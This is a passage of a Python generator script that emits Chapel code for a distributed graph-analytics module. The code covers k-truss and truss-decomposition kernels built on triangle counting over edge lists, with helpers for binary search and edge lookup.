    GenNaiveDecompositionTest("TrussDecompositionNaivePathMerge")
    GenNaiveDecompositionTest("TrussDecompositionNaiveMinSearch")
    print('''
var AtoTriCount=makeDistArray(Ne,atomic int);
''')
    # Atomic decomposition variants.
    for fun in ("TrussDecomposition", "TrussMixDecomposition"):
        GenDecompositionAtomicTest(fun)
    print('''
}// end of truss decomposition analysis
''')
# Chapel source emitted verbatim as the head of the generated TrussMsg module:
# the module declaration and `use` imports, the segTrussMsg() message handler's
# payload parsing and shared mutable state, and the helper procs (xlocal,
# binSearchE, getupK) used by the truss kernels generated after it.
# NOTE(review): the string bytes ARE the generated program — do not edit them
# for style; any change here changes the emitted Chapel code.
BeginCode='''
module TrussMsg {
use Reflection;
use ServerErrors;
use Logging;
use Message;
use SegmentedArray;
use ServerErrorStrings;
use ServerConfig;
use MultiTypeSymbolTable;
use MultiTypeSymEntry;
use IO;
use SymArrayDmap;
use RadixSortLSD;
use Set;
use DistributedBag;
use Time;
use CommAggregation;
use Sort;
use Map;
use DistributedDeque;
use Atomics;
use IO.FormattedIO;
use GraphArray;
use GraphMsg;
private config const logLevel = LogLevel.DEBUG;
const smLogger = new Logger(logLevel);
var outMsg:string;
proc segTrussMsg(cmd: string, payload: string, st: borrowed SymTab): MsgTuple throws {
//In this procedure, we implement different Truss analysis methods, including k-truss, max truss and truss decomposition
var repMsg: string;
var (kTrussN,n_verticesN, n_edgesN, directedN, weightedN, graphEntryName, restpart )
= payload.splitMsgToTuple(7);
var kValue=kTrussN:int;
var Nv=n_verticesN:int;
var Ne=n_edgesN:int;
var Directed=false:bool;
var Weighted=false:bool;
if ((directedN:int)==1){
Directed=true;
}
if ((weightedN:int)==1) {
Weighted=true;
}
var countName:string;
var StartEdgeAry: [0..numLocales-1] int;
var EndEdgeAry: [0..numLocales-1] int;
var RemoteAccessTimes: [0..numLocales-1] int;
var LocalAccessTimes: [0..numLocales-1] int;
var EdgeCnt: [0..Ne] int;
var EdgeFlags:[0..Ne] int;
var EdgeCount:[0..Ne] int;
StartEdgeAry=-1;
EndEdgeAry=-1;
RemoteAccessTimes=0;
LocalAccessTimes=0;
EdgeCnt=0;
EdgeFlags = 0;
EdgeCount = 0;
var srcN, dstN, startN, neighbourN,vweightN,eweightN, rootN :string;
var srcRN, dstRN, startRN, neighbourRN:string;
var repCount=0:int;
var gEntry:borrowed GraphSymEntry = getGraphSymEntry(graphEntryName, st);
var ag = gEntry.graph;
var EdgeDeleted=makeDistArray(Ne,int); //we need a global instead of local array
var lEdgeDeleted=makeDistArray(Ne,int); //we need a global instead of local array
var AllRemoved:bool;
EdgeDeleted=-1;
lEdgeDeleted=-1;
var kLow=3:int;
var kUp:int;
var kMid:int;
var maxtimer:Timer;
// this can be a general procedure to check if x is in given range so we put it outside
proc xlocal(x :int, low:int, high:int):bool{
if (low<=x && x<=high) {
return true;
} else {
return false;
}
}
// binary search if key is in ary from index l to h
proc binSearchE(ary:[?D] int,l:int,h:int,key:int):int {
//if ( (l<D.low) || (h>D.high) || (l<0)) {
// return -1;
//}
if ( (l>h) || ((l==h) && ( ary[l]!=key))) {
return -1;
}
if (ary[l]==key){
return l;
}
if (ary[h]==key){
return h;
}
var m= (l+h)/2:int;
if ((m==l) ) {
return -1;
}
if (ary[m]==key ){
return m;
} else {
if (ary[m]<key) {
return binSearchE(ary,m+1,h,key);
}
else {
return binSearchE(ary,l,m-1,key);
}
}
}// end of proc
//estimate the max k for given graph
proc getupK(nei:[?D1] int, neiR:[?D11] int):int {
var dNumber: [0..Nv-1] int;
dNumber=0;
var maxk=0:int;
for i in 0..Nv-1 {
if nei[i]+neiR[i]>=Nv-1 {
dNumber[Nv-1]+=1;
} else {
dNumber[nei[i]+neiR[i]]+=1;
}
}
//writeln("Degree value=",dNumber);
var tmpi=Nv-1:int;
while tmpi>0 {
dNumber[tmpi-1]+=dNumber[tmpi];
if dNumber[tmpi-1]>=tmpi {
maxk=tmpi;
break;
}
tmpi=tmpi-1;
}
return maxk;
}
'''
# The following bare (unassigned) triple-quoted string holds the original
# hand-written Chapel code, kept only for reference; as an expression
# statement it is evaluated and discarded, never printed into the output.
'''
// Begin of KTruss analysis series
// For undirected graph, using Naive and list intersection method. It should have worst performance.
// This procedure is just used for worst case test
proc kTrussNaiveListIntersection(k:int,nei:[?D1] int, start_i:[?D2] int,src:[?D3] int, dst:[?D4] int,
neiR:[?D11] int, start_iR:[?D12] int,srcR:[?D13] int, dstR:[?D14] int,TriCount:[?D5] int):string throws{
var SetCurF= new DistBag(int,Locales);//use bag to keep the current frontier
var SetNextF= new DistBag((int,int),Locales); //use bag to keep the next frontier
var N1=0:int;
var N2=0:int;
var ConFlag=true:bool;
EdgeDeleted=-1;
var RemovedEdge=0: int;
var timer:Timer;
proc RemoveDuplicatedEdges( cur: int):int {
//if ( (cur<D3.low) || (cur >D3.high) || (cur==0) ) {
if ( (cur==0) ) {
return -1;
}
var u=src[cur]:int;
var v=dst[cur]:int;
var lu=start_i[u]:int;
var nu=nei[u]:int;
var lv=start_i[v]:int;
var nv=nei[v]:int;
var DupE:int;
if ((nu<=1) || (cur<=lu)) {
DupE=-1;
} else {
DupE =binSearchE(dst,lu,cur-1,v);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
} else {
if (u>v) {
if (nv<=0) {
DupE=-1;
} else {
DupE=binSearchE(dst,lv,lv+nv-1,u);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
}
}
}
return DupE;
}
// given vertces u and v, return the edge ID e=<u,v> or e=<v,u>
proc findEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
if (eid==-1) {// if b
beginE=start_i[v];
if (nei[v]>0) {
if ( (beginE>=0) && (u>=dst[beginE]) && (u<=dst[beginE+nei[v]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[v]-1,u);
// search <v,u> in undirect edges
}
}
}// end of if b
return eid;
}// end of proc findEdge(u:int,v:int)
//here we begin the first naive version
//coforall loc in Locales {
// on loc {
{
{
//var ld = src.localSubdomain();
//var startEdge = ld.low;
//var endEdge = ld.high;
var startEdge = 0;
var endEdge = Ne-1;
forall i in startEdge..endEdge {
var v1=src[i];
var v2=dst[i];
if ( (nei[v1]+neiR[v1])<k-1 ||
((nei[v2]+neiR[v2])<k-1) || (v1==v2)) {
//we will delete all the edges connected with a vertex only has very small degree
//(less than k-1)
EdgeDeleted[i]=k-1;
if (v1==v2) {
//writeln("My locale=",here.id," Find self-loop ",i,"=<",src[i],",",dst[i],">");
}
}
if (EdgeDeleted[i]==-1) {
var DupE= RemoveDuplicatedEdges(i);
if (DupE!=-1) {
//we find duplicated edge
}
}
}
}
}// end of coforall loc
//After Preprocessing
timer.start();
//we will try to remove all the unnecessary edges in the graph
while (ConFlag) {
//ConFlag=false;
// first we calculate the number of triangles
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
TriCount[i]=0;
var uadj = new set(int, parSafe = true);
var vadj = new set(int, parSafe = true);
var u = src[i];
var v = dst[i];
var beginTmp=start_i[u];
var endTmp=beginTmp+nei[u]-1;
if ((EdgeDeleted[i]==-1) && (u!=v) ){
if ( (nei[u]>0) ){
forall x in dst[beginTmp..endTmp] with (ref uadj) {
var e=findEdge(u,x);//here we find the edge ID to check if it has been removed
if (e==-1){
//writeln("vertex ",x," and ",u," findEdge Error self-loop or no such edge");
} else {
if ((EdgeDeleted[e] ==-1) && (x !=v)) {
uadj.add(x);
}
}
}
}
beginTmp=start_iR[u];
endTmp=beginTmp+neiR[u]-1;
if ((neiR[u]>0) ){
forall x in dstR[beginTmp..endTmp] with (ref uadj) {
var e=findEdge(x,u);
if (e==-1){
//writeln("vertex ",x," and ",u," findEdge Error self-loop or no such edge");
} else {
if ((EdgeDeleted[e] ==-1) && (x !=v)) {
uadj.add(x);
}
}
}
}
beginTmp=start_i[v];
endTmp=beginTmp+nei[v]-1;
if ( (nei[v]>0) ){
forall x in dst[beginTmp..endTmp] with (ref vadj) {
var e=findEdge(v,x);//here we find the edge ID to check if it has been removed
if (e==-1){
//writeln("vertex ",x," and ",u," findEdge Error self-loop or no such edge");
} else {
if ((EdgeDeleted[e] ==-1) && (x !=u)) {
vadj.add(x);
}
}
}
}
beginTmp=start_iR[v];
endTmp=beginTmp+neiR[v]-1;
if ((neiR[v]>0) ){
forall x in dstR[beginTmp..endTmp] with (ref vadj) {
var e=findEdge(x,v);
if (e==-1){
//writeln("vertex ",x," and ",u," findEdge Error self-loop or no such edge");
} else {
if ((EdgeDeleted[e] ==-1) && (x !=u)) {
vadj.add(x);
}
}
}
}
if (! uadj.isEmpty() ){
var Count=0:int;
forall s in uadj with ( + reduce Count) {
//var e=findEdge(s,v);
if ( vadj.contains(s) ) {
Count +=1;
}
}
TriCount[i] = Count;
// here we get the number of triangles of edge ID i
}// end of if
}//end of if
}// end of forall. We get the number of triangles for each edge
}// end of on loc
} // end of coforall loc in Locales
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((EdgeDeleted[i]==-1) && (TriCount[i] < k-2)) {
EdgeDeleted[i] = k-1;
SetCurF.add(i);
}
}
}// end of on loc
} // end of coforall loc in Locales
if ( SetCurF.getSize()<=0){
ConFlag=false;
}
SetCurF.clear();
N2+=1;
}// end while
timer.stop();
AllRemoved=true;
var tmpi=0;
for i in 0..Ne-1 {
if (EdgeDeleted[i]==-1) {
AllRemoved=false;
} else {
tmpi+=1;
}
}
outMsg="After KTruss Naive List Intersection,Given k="+k:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Naive List Intersection,Total execution time="+(timer.elapsed()):string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Naive List Intersection,Total number of iterations ="+N2:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Naive List Intersection,Totally remove "+tmpi:string+ " Edges";
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
var countName = st.nextName();
var countEntry = new shared SymEntry(EdgeDeleted);
st.addEntry(countName, countEntry);
var cntMsg = 'created ' + st.attrib(countName);
return cntMsg;
} // end of proc KTrussNaiveListIntersection
// For undirected graph, using naive method. Its performance should be worse, but it is a simple implementation to
// check the correctness of the results
proc kTrussNaiveListIntersectionSmall(k:int,nei:[?D1] int, start_i:[?D2] int,src:[?D3] int, dst:[?D4] int,
neiR:[?D11] int, start_iR:[?D12] int,srcR:[?D13] int, dstR:[?D14] int,TriCount:[?D5] int):string throws{
var SetCurF= new DistBag(int,Locales);//use bag to keep the current frontier
var SetNextF= new DistBag((int,int),Locales); //use bag to keep the next frontier
var N1=0:int;
var N2=0:int;
var ConFlag=true:bool;
EdgeDeleted=-1;
var RemovedEdge=0: int;
var timer:Timer;
proc RemoveDuplicatedEdges( cur: int):int {
//if ( (cur<D3.low) || (cur >D3.high) || (cur==0) ) {
if ( (cur==0) ) {
return -1;
}
var u=src[cur]:int;
var v=dst[cur]:int;
var lu=start_i[u]:int;
var nu=nei[u]:int;
var lv=start_i[v]:int;
var nv=nei[v]:int;
var DupE:int;
if ((nu<=1) || (cur<=lu)) {
DupE=-1;
} else {
DupE =binSearchE(dst,lu,cur-1,v);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
} else {
if (u>v) {
if (nv<=0) {
DupE=-1;
} else {
DupE=binSearchE(dst,lv,lv+nv-1,u);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
}
}
}
return DupE;
}
// given vertces u and v, return the edge ID e=<u,v> or e=<v,u>
proc findEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
if (eid==-1) {// if b
beginE=start_i[v];
if (nei[v]>0) {
if ( (beginE>=0) && (u>=dst[beginE]) && (u<=dst[beginE+nei[v]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[v]-1,u);
// search <v,u> in undirect edges
}
}
}// end of if b
return eid;
}// end of proc findEdge(u:int,v:int)
// given vertces u and v, return the edge ID e=<u,v>
proc exactEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
return eid;
}// end of proc exatEdge(u:int,v:int)
//here we begin the first naive version
//coforall loc in Locales {
// on loc {
{
{
//var ld = src.localSubdomain();
//var startEdge = ld.low;
//var endEdge = ld.high;
var startEdge = 0;
var endEdge = Ne-1;
forall i in startEdge..endEdge {
var v1=src[i];
var v2=dst[i];
if ( (nei[v1]+neiR[v1])<k-1 ||
((nei[v2]+neiR[v2])<k-1) || (v1==v2)) {
//we will delete all the edges connected with a vertex only has very small degree
//(less than k-1)
EdgeDeleted[i]=k-1;
}
if (EdgeDeleted[i]==-1) {
var DupE= RemoveDuplicatedEdges(i);
if (DupE!=-1) {
//we find duplicated edge
}
}
}
}
}// end of coforall loc
//After Preprocessing
timer.start();
//we will try to remove all the unnecessary edges in the graph
while (ConFlag) {
// first we calculate the number of triangles
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in startEdge..endEdge with(ref SetCurF){
TriCount[i]=0;
var sVadj = new set(int, parSafe = true);
var u = src[i];
var v = dst[i];
var du=nei[u]+neiR[u];
var dv=nei[v]+neiR[v];
var sV:int;
var lV:int;
var ldV:int;
if ( du<=dv ) {
sV=u; //sV is the small degree vertex
lV=v; //lV is the large degree vertex
ldV=dv; //ldV is the degree number
} else {
sV=v;
lV=u;
ldV=du;
}
// here we search from the vertex who has small degree
{
var beginTmp=start_i[sV];
var endTmp=beginTmp+nei[sV]-1;
if ((EdgeDeleted[i]==-1) && (sV!=lV) ){
if ( (nei[sV]>0) ){
forall x in dst[beginTmp..endTmp] with (ref sVadj) {
var e=exactEdge(sV,x);//here we find the edge ID to check if it has been removed
if (e!=-1){
if ((EdgeDeleted[e] ==-1) && (x !=lV)) {
sVadj.add(x);
}
}
}
}
beginTmp=start_iR[sV];
endTmp=beginTmp+neiR[sV]-1;
if ((neiR[sV]>0) ){
forall x in dstR[beginTmp..endTmp] with (ref sVadj) {
var e=exactEdge(x,sV);
if (e!=-1){
if ((EdgeDeleted[e] ==-1) && (x !=lV)) {
sVadj.add(x);
}
}
}
}
if (! sVadj.isEmpty() ){
var Count=0:int;
forall s in sVadj with ( + reduce Count) {
var ds1=nei[s]+neiR[s];
var e:int;
if (ds1<ldV) {
e=findEdge(s,lV);
} else {
e=findEdge(lV,s);
}
if ( (e!=-1) && (e!=i) ) {
if ( EdgeDeleted[e]==-1) {
Count +=1;
}
}
}
TriCount[i] = Count;
// here we get the number of triangles of edge ID i
}// end of if
}//end of if EdgeDeleted[i]==-1
}// end of triangle counting
}// end of forall. We get the number of triangles for each edge
}// end of on loc
} // end of coforall loc in Locales
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((EdgeDeleted[i]==-1) && (TriCount[i] < k-2)) {
EdgeDeleted[i] = k-1;
SetCurF.add(i);
}
}
}// end of on loc
} // end of coforall loc in Locales
if ( SetCurF.getSize()<=0){
ConFlag=false;
}
SetCurF.clear();
N2+=1;
}// end while
timer.stop();
AllRemoved=true;
var tmpi=0;
for i in 0..Ne-1 {
if (EdgeDeleted[i]==-1) {
AllRemoved=false;
} else {
tmpi+=1;
}
}
outMsg="After KTruss Naive List Intersection Small,Given k="+k:string+" All removed="+AllRemoved:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Naive List Intersection Small,Total execution time="+(timer.elapsed()):string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Naive List Intersection Small,Total number of iterations ="+N2:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Naive List Intersection Small,Totally remove "+tmpi:string+ " Edges";
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
var countName = st.nextName();
var countEntry = new shared SymEntry(EdgeDeleted);
st.addEntry(countName, countEntry);
var cntMsg = 'created ' + st.attrib(countName);
return cntMsg;
} // end of proc KTrussNaiveListIntersectionSmall
// For undirected graph, using naive method. Its performance should be worse, but it is a simple implementation to
// check the correctness of the results
proc kTrussNaiveListIntersectionSmallSeq(k:int,nei:[?D1] int, start_i:[?D2] int,src:[?D3] int, dst:[?D4] int,
neiR:[?D11] int, start_iR:[?D12] int,srcR:[?D13] int, dstR:[?D14] int,TriCount:[?D5] int):string throws{
var SetCurF= new DistBag(int,Locales);//use bag to keep the current frontier
var SetNextF= new DistBag((int,int),Locales); //use bag to keep the next frontier
var N1=0:int;
var N2=0:int;
var ConFlag=true:bool;
EdgeDeleted=-1;
var RemovedEdge=0: int;
var timer:Timer;
proc RemoveDuplicatedEdges( cur: int):int {
//if ( (cur<D3.low) || (cur >D3.high) || (cur==0) ) {
if ( (cur==0) ) {
return -1;
}
var u=src[cur]:int;
var v=dst[cur]:int;
var lu=start_i[u]:int;
var nu=nei[u]:int;
var lv=start_i[v]:int;
var nv=nei[v]:int;
var DupE:int;
if ((nu<=1) || (cur<=lu)) {
DupE=-1;
} else {
DupE =binSearchE(dst,lu,cur-1,v);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
} else {
if (u>v) {
if (nv<=0) {
DupE=-1;
} else {
DupE=binSearchE(dst,lv,lv+nv-1,u);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
}
}
}
return DupE;
}
// given vertces u and v, return the edge ID e=<u,v> or e=<v,u>
proc findEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
if (eid==-1) {// if b
beginE=start_i[v];
if (nei[v]>0) {
if ( (beginE>=0) && (u>=dst[beginE]) && (u<=dst[beginE+nei[v]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[v]-1,u);
// search <v,u> in undirect edges
}
}
}// end of if b
return eid;
}// end of proc findEdge(u:int,v:int)
// given vertces u and v, return the edge ID e=<u,v>
proc exactEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
return eid;
}// end of proc exatEdge(u:int,v:int)
//here we begin the first naive version
//coforall loc in Locales {
// on loc {
{
{
//var ld = src.localSubdomain();
//var startEdge = ld.low;
//var endEdge = ld.high;
var startEdge = 0;
var endEdge = Ne-1;
forall i in startEdge..endEdge {
var v1=src[i];
var v2=dst[i];
if ( (nei[v1]+neiR[v1])<k-1 ||
((nei[v2]+neiR[v2])<k-1) || (v1==v2)) {
//we will delete all the edges connected with a vertex only has very small degree
//(less than k-1)
EdgeDeleted[i]=k-1;
}
if (EdgeDeleted[i]==-1) {
var DupE= RemoveDuplicatedEdges(i);
if (DupE!=-1) {
//we find duplicated edge
}
}
}
}
}// end of coforall loc
//After Preprocessing
timer.start();
//we will try to remove all the unnecessary edges in the graph
while (ConFlag) {
// first we calculate the number of triangles
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in startEdge..endEdge with(ref SetCurF){
TriCount[i]=0;
var sVadj = new set(int, parSafe = true);
var u = src[i];
var v = dst[i];
var du=nei[u]+neiR[u];
var dv=nei[v]+neiR[v];
var sV:int;
var lV:int;
var ldV:int;
if ( du<=dv ) {
sV=u; //sV is the small degree vertex
lV=v; //lV is the large degree vertex
ldV=dv; //ldV is the degree number
} else {
sV=v;
lV=u;
ldV=du;
}
// here we search from the vertex who has small degree
{
var beginTmp=start_i[sV];
var endTmp=beginTmp+nei[sV]-1;
if ((EdgeDeleted[i]==-1) && (sV!=lV) ){
if ( (nei[sV]>0) ){
for x in dst[beginTmp..endTmp] {
var e=exactEdge(sV,x);//here we find the edge ID to check if it has been removed
if (e!=-1){
if ((EdgeDeleted[e] ==-1) && (x !=lV)) {
sVadj.add(x);
}
}
}
}
beginTmp=start_iR[sV];
endTmp=beginTmp+neiR[sV]-1;
if ((neiR[sV]>0) ){
for x in dstR[beginTmp..endTmp] {
var e=exactEdge(x,sV);
if (e!=-1){
if ((EdgeDeleted[e] ==-1) && (x !=lV)) {
sVadj.add(x);
}
}
}
}
if (! sVadj.isEmpty() ){
var Count=0:int;
for s in sVadj {
var ds1=nei[s]+neiR[s];
var e:int;
if (ds1<ldV) {
e=findEdge(s,lV);
} else {
e=findEdge(lV,s);
}
if ( (e!=-1) && (e!=i) ) {
if ( EdgeDeleted[e]==-1) {
Count +=1;
}
}
}
TriCount[i] = Count;
// here we get the number of triangles of edge ID i
}// end of if
}//end of if EdgeDeleted[i]==-1
}// end of triangle counting
}// end of forall. We get the number of triangles for each edge
}// end of on loc
} // end of coforall loc in Locales
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((EdgeDeleted[i]==-1) && (TriCount[i] < k-2)) {
EdgeDeleted[i] = k-1;
SetCurF.add(i);
}
}
}// end of on loc
} // end of coforall loc in Locales
if ( SetCurF.getSize()<=0){
ConFlag=false;
}
SetCurF.clear();
N2+=1;
}// end while
timer.stop();
AllRemoved=true;
var tmpi=0;
for i in 0..Ne-1 {
if (EdgeDeleted[i]==-1) {
AllRemoved=false;
} else {
tmpi+=1;
}
}
outMsg="After KTruss Naive List Intersection Small Seq,Given k="+k:string+" All removed="+AllRemoved:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Naive List Intersection Small Seq,Total execution time="+(timer.elapsed()):string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Naive List Intersection Small Seq,Total number of iterations ="+N2:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Naive List Intersection Small Seq,Totally remove "+tmpi:string+ " Edges";
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
var countName = st.nextName();
var countEntry = new shared SymEntry(EdgeDeleted);
st.addEntry(countName, countEntry);
var cntMsg = 'created ' + st.attrib(countName);
return cntMsg;
} // end of proc KTrussNaiveListIntersectionSmallSeq
// For undirected graph, using Naive and list intersection method. It should have worst performance.
// This procedure is just used for worst case test
proc kTrussNaiveListIntersectionSeq(k:int,nei:[?D1] int, start_i:[?D2] int,src:[?D3] int, dst:[?D4] int,
neiR:[?D11] int, start_iR:[?D12] int,srcR:[?D13] int, dstR:[?D14] int,TriCount:[?D5] int):string throws{
var SetCurF= new DistBag(int,Locales);//use bag to keep the current frontier
var SetNextF= new DistBag((int,int),Locales); //use bag to keep the next frontier
var N1=0:int;
var N2=0:int;
var ConFlag=true:bool;
EdgeDeleted=-1;
var RemovedEdge=0: int;
var timer:Timer;
proc RemoveDuplicatedEdges( cur: int):int {
//if ( (cur<D3.low) || (cur >D3.high) || (cur==0) ) {
if ( (cur==0) ) {
return -1;
}
var u=src[cur]:int;
var v=dst[cur]:int;
var lu=start_i[u]:int;
var nu=nei[u]:int;
var lv=start_i[v]:int;
var nv=nei[v]:int;
var DupE:int;
if ((nu<=1) || (cur<=lu)) {
DupE=-1;
} else {
DupE =binSearchE(dst,lu,cur-1,v);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
} else {
if (u>v) {
if (nv<=0) {
DupE=-1;
} else {
DupE=binSearchE(dst,lv,lv+nv-1,u);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
}
}
}
return DupE;
}
// given vertces u and v, return the edge ID e=<u,v> or e=<v,u>
proc findEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
if (eid==-1) {// if b
beginE=start_i[v];
if (nei[v]>0) {
if ( (beginE>=0) && (u>=dst[beginE]) && (u<=dst[beginE+nei[v]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[v]-1,u);
// search <v,u> in undirect edges
}
}
}// end of if b
return eid;
}// end of proc findEdge(u:int,v:int)
//here we begin the first naive version
//coforall loc in Locales {
// on loc {
{
{
//var ld = src.localSubdomain();
//var startEdge = ld.low;
//var endEdge = ld.high;
var startEdge = 0;
var endEdge = Ne-1;
forall i in startEdge..endEdge {
var v1=src[i];
var v2=dst[i];
if ( (nei[v1]+neiR[v1])<k-1 ||
((nei[v2]+neiR[v2])<k-1) || (v1==v2)) {
//we will delete all the edges connected with a vertex only has very small degree
//(less than k-1)
EdgeDeleted[i]=k-1;
if (v1==v2) {
//writeln("My locale=",here.id," Find self-loop ",i,"=<",src[i],",",dst[i],">");
}
}
if (EdgeDeleted[i]==-1) {
var DupE= RemoveDuplicatedEdges(i);
if (DupE!=-1) {
//we find duplicated edge
}
}
}
}
}// end of coforall loc
//After Preprocessing
timer.start();
//we will try to remove all the unnecessary edges in the graph
while (ConFlag) {
//ConFlag=false;
// first we calculate the number of triangles
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
TriCount[i]=0;
var uadj = new set(int, parSafe = true);
var vadj = new set(int, parSafe = true);
var u = src[i];
var v = dst[i];
var beginTmp=start_i[u];
var endTmp=beginTmp+nei[u]-1;
if ((EdgeDeleted[i]==-1) && (u!=v) ){
if ( (nei[u]>0) ){
for x in dst[beginTmp..endTmp] {
var e=findEdge(u,x);//here we find the edge ID to check if it has been removed
if (e==-1){
//writeln("vertex ",x," and ",u," findEdge Error self-loop or no such edge");
} else {
if ((EdgeDeleted[e] ==-1) && (x !=v)) {
uadj.add(x);
}
}
}
}
beginTmp=start_iR[u];
endTmp=beginTmp+neiR[u]-1;
if ((neiR[u]>0) ){
for x in dstR[beginTmp..endTmp] {
var e=findEdge(x,u);
if (e==-1){
//writeln("vertex ",x," and ",u," findEdge Error self-loop or no such edge");
} else {
if ((EdgeDeleted[e] ==-1) && (x !=v)) {
uadj.add(x);
}
}
}
}
beginTmp=start_i[v];
endTmp=beginTmp+nei[v]-1;
if ( (nei[v]>0) ){
for x in dst[beginTmp..endTmp] {
var e=findEdge(v,x);//here we find the edge ID to check if it has been removed
if (e==-1){
//writeln("vertex ",x," and ",u," findEdge Error self-loop or no such edge");
} else {
if ((EdgeDeleted[e] ==-1) && (x !=u)) {
vadj.add(x);
}
}
}
}
beginTmp=start_iR[v];
endTmp=beginTmp+neiR[v]-1;
if ((neiR[v]>0) ){
for x in dstR[beginTmp..endTmp] {
var e=findEdge(x,v);
if (e==-1){
//writeln("vertex ",x," and ",u," findEdge Error self-loop or no such edge");
} else {
if ((EdgeDeleted[e] ==-1) && (x !=u)) {
vadj.add(x);
}
}
}
}
if (! uadj.isEmpty() ){
var Count=0:int;
for s in uadj {
//var e=findEdge(s,v);
if ( vadj.contains(s) ) {
Count +=1;
}
